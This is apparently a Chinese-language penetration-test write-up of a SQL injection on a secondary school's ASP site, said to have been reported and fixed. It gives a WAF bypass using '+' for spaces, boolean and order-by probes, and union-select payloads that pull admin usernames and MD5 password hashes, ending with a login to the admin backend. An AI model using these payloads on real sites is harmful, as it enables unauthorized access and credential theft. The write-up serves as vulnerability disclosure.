一個有趣的SQL注入漏洞和繞過waf

前言：

目標是一個中學的站點，在一次挖洞過程中遇到個sql注入，漏洞已報送平臺進行了修復。

訪問url/gywm.asp?id=95%20and%201=1被攔截了

Wts-waf我這里利用了此文章

https://www.freebuf.com/articles/268726.html

url/gywm.asp?id=95 +and+1=1的時候返回正常

url/gywm.asp?id=95 +and+1=2時候返回空白頁面

已確定存在sql注入漏洞;

開始使用order by獲得表的列數

訪問url/gywm.asp?id=95+order+by+19--+的時候頁面正常的;

訪問: url/gywm.asp?id=95+order+by+20--+的時候頁面顯示500

判斷出列數為19，此時我們可以通過union聯合查詢進行注入。

Payload：url/gywm.asp?id=95+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+admin

此時我們可知admin的位置

此時我把猜出來的表和列名放在了3和10的位置, 這下就已拿到了這兩列名中的值。

Payload: url/gywm.asp?id=95+union+select+1,2,username,4,5,6,7,8,9,userpass,11,12,13,14,15,16,17,18,19+from+admin

然后把md5密碼解密后直接進去后臺滲透也到此結束